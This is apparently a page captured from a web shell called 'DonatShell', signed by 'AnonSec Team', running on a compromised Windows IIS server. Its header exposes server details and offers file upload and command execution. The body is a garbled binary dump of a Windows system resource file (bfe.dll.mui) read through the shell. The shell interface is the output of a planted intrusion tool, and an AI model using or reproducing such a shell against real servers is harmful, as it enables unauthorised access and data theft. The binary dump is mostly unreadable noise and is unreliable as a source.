DonatShell
Server IP : 180.180.241.3  /  Your IP : 216.73.216.252
Web Server : Microsoft-IIS/7.5
System : Windows NT NETWORK-NHRC 6.1 build 7601 (Windows Server 2008 R2 Standard Edition Service Pack 1) i586
User : IUSR ( 0)
PHP Version : 5.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /Windows/SysWOW64/en-US/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME SHELL ]     

Current File : /Windows/SysWOW64/en-US/bfe.dll.mui
MZ@	!L!This program cannot be run in DOS mode.

$uEEELlDLl
DRichEPEL[J!	b`#@`.rsrcpb@@@0H8Ph(@Xp !&',-304H5`6x79?EL~ 8	P	`	p											 	0	@	P	`	p											 	0H8L!#BH$%t`'L))+f-:L./01	;	D|M
XXY\H\Z<`Ra
lMUIYZV$I!1`0NKwMUIen-USInbound IP Packet v4 Layer"Inbound IP Packet v4 Discard LayerInbound IP Packet v6 Layer"Inbound IP Packet v6 Discard LayerOutbound IP Packet v4 Layer#Outbound IP Packet v4 Discard LayerOutbound IP Packet v6 Layer#Outbound IP Packet v6 Discard LayerIP Forward v4 LayerIP Forward v4 Discard LayerInbound Transport v4 Layer"Inbound Transport v4 Discard LayerInbound Transport v6 Layer"Inbound Transport v6 Discard LayerOutbound Transport v4 Layer#Outbound Transport v4 Discard LayerOutbound Transport v6 Layer#Outbound Transport v6 Discard LayerStream v4 LayerStream v4 Discard LayerStream v6 LayerStream v6 Discard LayerDatagram Data v4 LayerDatagram Data v4 Discard LayerDatagram Data v6 LayerDatagram Data v6 Discard LayerInbound ICMP Error v4 Layer#Inbound ICMP Error v4 Discard LayerInbound ICMP Error v6 Layer#Inbound ICMP Error v6 Discard Layer ALE Resource Assignment v4 Layer(ALE Resource Assignment v4 Discard Layer ALE Resource Assignment v6 Layer(ALE Resource Assignment v6 Discard LayerALE Listen v4 LayerALE Listen v4 Discard LayerALE Listen v6 LayerALE Listen v6 Discard LayerALE Receive/Accept v4 Layer#ALE Receive/Accept v4 Discard LayerALE Receive/Accept v6 Layer#ALE Receive/Accept v6 Discard LayerALE Connect v4 LayerALE Connect v4 Discard LayerALE Connect v6 LayerALE Connect v6 Discard LayerALE Flow Established v4 Layer%ALE Flow Established v4 Discard LayerALE Flow Established v6 Layer%ALE Flow Established v6 Discard LayerInbound MAC 802.3 LayerOutbound MAC 802.3 LayerIPsec KM Demux v4 LayerIPsec KM Demux v6 LayerIPsec v4 LayerIPsec v6 LayerIKE v4 LayerIKE v6 LayerPARPC UM LayerRPC EPMAP LayerOutbound ICMP Error v4 Layer$Outbound ICMP Error v4 Discard LayerOutbound ICMP Error v6 Layer$Outbound ICMP Error v6 Discard LayerRPC EP ADD LayerRPC Proxy Connect LayerRPC Proxy Interface LayerIP Forward v6 LayerIP Forward v6 Discard LayerALE Route v4 LayerALE Route v6 Layer!Keying Module Authorization LayerName Resolution Cache v4 LayerName Resolution Cache v6 LayerALE Resource Release v4 LayerALE Resource Release v6 LayerALE Endpoint Closure v4 LayerALE Endpoint Closure v6 LayerALE Connect Redirect v4 LayerALE Connect Redirect v6 LayerALE Bind Redirect v4 LayerALE Bind Redirect v6 LayerStream Packet v4 LayerStream Packet v6 LayerWFP Built-in Universal Sublayer"WFP Built-in Legacy IPsec Sublayer#WFP Built-in Secure Socket Sublayer)WFP Built-in TCP Chimney Offload Sublayer WFP Built-in Inspection SublayerRPC Built-in Audit Sublayer"WFP Built-in IPsec Tunnel Sublayer$WFP Built-in Edge Traversal Sublayer3WFP Built-in IPsec Forward Outbound Tunnel Sublayer*WFP Built-in IPsec DoS Protection SublayerPA;	Condition ID:	%ls
	Match value:	%ls
	Condition value:	%ls
Equal toGreater than	Less thanGreater than or equal toLess than or equal toIn rangePA
All flags set
Any flags setNo flags setEqual to (case insensitive)Not equal toPAAWFP Built-in Default Secure Socket AuthIP Policy Provider ContextUAuthenticated Internet Protocol (AuthIP) main mode default policy for secure sockets.@WFP Built-in Default Secure Socket IPsec Policy Provider ContextPInternet Protocol Security (IPsec) quick mode default policy for secure sockets.5WFP Built-in IPsec Inbound Transport v4 Layer CalloutzVerifies that each received packet that is supposed to arrive over a transport mode security association arrives securely.5WFP Built-in IPsec Inbound Transport v6 Layer CalloutzVerifies that each received packet that is supposed to arrive over a transport mode security association arrives securely.6WFP Built-in IPsec Outbound Transport v4 Layer CalloutgIndicates to IPsec the outbound traffic that must be secured over transport mode security associations.6WFP Built-in IPsec Outbound Transport v6 Layer CalloutgIndicates to IPsec the outbound traffic that must be secured over transport mode security associations.2WFP Built-in IPsec Inbound Tunnel v4 Layer CalloutwVerifies that each received packet that is supposed to arrive over a tunnel mode security association arrives securely.2WFP Built-in IPsec Inbound Tunnel v6 Layer CalloutwVerifies that each received packet that is supposed to arrive over a tunnel mode security association arrives securely.3WFP Built-in IPsec Outbound Tunnel v4 Layer CalloutdIndicates to IPsec the outbound traffic that must be secured over tunnel mode security associations.3WFP Built-in IPsec Outbound Tunnel v6 Layer CalloutdIndicates to IPsec the outbound traffic that must be secured over tunnel mode security associations.:WFP Built-in IPsec Forward Inbound Tunnel v4 Layer CalloutwVerifies that each received packet that is supposed to arrive over a tunnel mode security association arrives securely.:WFP Built-in IPsec Forward Inbound Tunnel v6 Layer CalloutwVerifies that each received packet that is supposed to arrive over a tunnel mode security association arrives securely.;WFP Built-in IPsec Forward Outbound Tunnel v4 Layer CallouteIndicates to IPsec the outbound traffic that must be secured over a tunnel mode security association.;WFP Built-in IPsec Forward Outbound Tunnel v6 Layer CallouteIndicates to IPsec the outbound traffic that must be secured over a tunnel mode security association.;WFP Built-in IPsec Inbound Initiate Secure v4 Layer CalloutZVerifies that each incoming connection that is supposed to arrive secure arrives securely.;WFP Built-in IPsec Inbound Initiate Secure v6 Layer CalloutZVerifies that each incoming connection that is supposed to arrive secure arrives securely./WFP Built-in IPsec ALE Connect v4 Layer Callout6Applies IPsec policy modifiers to client applications./WFP Built-in IPsec ALE Connect v6 Layer Callout6Applies IPsec policy modifiers to client applications.;WFP Built-in Silent Drop Transport v4 Discard Layer Callout}Implements stealth-mode filtering by silently dropping all incoming packets for which TCP does not have a listening endpoint.;WFP Built-in Silent Drop Transport v6 Discard Layer Callout}Implements stealth-mode filtering by silently dropping all incoming packets for which TCP does not have a listening endpoint.=WFP Built-in TCP Chimney Offload ALE Connect v4 Layer CalloutEEnables or disables TCP Chimney Offload for each outgoing connection.=WFP Built-in TCP Chimney Offload ALE Connect v6 Layer CalloutEEnables or disables TCP Chimney Offload for each outgoing connection.DWFP Built-in TCP Chimney Offload ALE Receive/Accept v4 Layer CalloutEEnables or disables TCP Chimney Offload for each incoming connection.DWFP Built-in TCP Chimney Offload ALE Receive/Accept v6 Layer CalloutEEnables or disables TCP Chimney Offload for each incoming connection.4WFP Built-in Set Option ALE Connect v4 Layer Callout(Sets classify options on outbound flows.4WFP Built-in Set Option ALE Connect v6 Layer Callout(Sets classify options on outbound flows.EWFP Built-in IPsec Inbound Tunnel ALE Receive/Accept v4 Layer CalloutdPermits IPsec tunnel mode IP-in-IP packets when they get classified at the ALE receive/accept layer.EWFP Built-in IPsec Inbound Tunnel ALE Receive/Accept v6 Layer CalloutdPermits IPsec tunnel mode IP-in-IP packets when they get classified at the ALE receive/accept layer.DWFP Built-in Edge Traversal ALE Resource Assignment v4 Layer CalloutwSignals Windows when an application is attempting to bind to an interface and has opted in for edge traversing traffic.DWFP Built-in Edge Traversal ALE Resource Assignment v6 Layer CalloutwSignals Windows when an application is attempting to bind to an interface and has opted in for edge traversing traffic.7WFP Built-in Edge Traversal ALE Listen v4 Layer CalloutySignals Windows when an application is attempting to listen on an interface and has opted in for edge traversing traffic.7WFP Built-in Edge Traversal ALE Listen v6 Layer CalloutySignals Windows when an application is attempting to listen on an interface and has opted in for edge traversing traffic.:WFP Built-in IPsec DoS Protection Forward v4 Layer CalloutmInspection point for IPsec Denial of Service Protection at the forward layer to create state and prevent DoS.:WFP Built-in IPsec DoS Protection Forward v6 Layer CalloutPAmInspection point for IPsec Denial of Service Protection at the forward layer to create state and prevent DoS.PA!WFP Built-in IKE Exemption Filter)Default exemption filter for IKE traffic.Base Filtering EngineOThe Base Filtering Engine (BFE) is a service that manages firewall and Internet Protocol security (IPsec) policies and implements user mode filtering. Stopping or disabling the BFE service will significantly reduce the security of the system. It will also result in unpredictable behavior in IPsec management and firewall applications.Default WinPE PolicyMicrosoft Corporation\Microsoft Windows WFP Built-in IKEEXT provider used to identify filters added by IKE/AuthIP.Microsoft CorporationrMicrosoft Windows WFP Built-in TCP Chimney Offload provider used to identify filters added by TCP Chimney Offload.Microsoft CorporationMicrosoft Windows WFP Built-in IPsec DoS Protection configuration provider used to identify filters added by IPsec Denial of Service Protection.PAMicrosoft CorporationThis task adjusts the start type for firewall-triggered services when the start type of the Base Filtering Engine (BFE) is disabled.PA00PP\P$$ Info

 Information

WFP: Packet Dropped - Filter Run-Time ID: %14, Layer Run-Time ID: %15

IPsec: Packet Dropped - Error Code: %9, Filter Run-Time ID: %12, Layer Run-Time ID: %13

<IPsec: Main Mode Failure

<IPsec: Quick Mode Failure

DIPsec: Extended Mode Failure

TIPsec DoS Protection: Packet Dropped

HIPsec: Main Mode SA Terminated

HIPsec: Main Mode SA Established

pIPsec: Extended Mode and Main Mode SAs Established

DIPsec DoS Protection Enabled

DIPsec DoS Protection Disabled

IPsec DoS Protection failed to create state because the maximum number of entries allowed by policy has been reached

TIPsec: Negotiation Request Initiated

<IPsec: Send ISAKMP Packet

DIPsec: Receive ISAKMP Packet

4WFP: User Mode Error

hAn IPsec quick mode security association ended.

|An IPsec quick mode security association was established.

WFP: Packet Dropped - Filter Run-Time ID: %10, Layer Run-Time ID: %11

NONE

IKEv1

IKEv2

AuthIP

MD5

SHA-1

SHA-256

 AES-GCM-128

 AES-GCM-192

 AES-GCM-256

$AES-GMAC-128

$AES-GMAC-192

$AES-GMAC-256

DES

3DES

 AES-CBC-128

 AES-CBC-192

 AES-CBC-256

(Transport Mode

 Tunnel Mode

Initiator

Responder

Inbound

Outbound

Forward

$Bidirectional

4VS_VERSION_INFO@@?StringFileInfo040904B0LCompanyNameMicrosoft CorporationTFileDescriptionBase Filtering Enginel&FileVersion6.1.7600.16385 (win7_rtm.090713-1255)0InternalNameBFE.DLL.LegalCopyright Microsoft Corporation. All rights reserved.@OriginalFilenameBFE.DLL.MUIj%ProductNameMicrosoft Windows Operating SystemBProductVersion6.1.7600.16385DVarFileInfo$Translation	PADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGXXPADDINGPADDINGX

Anon7 - 2022
AnonSec Team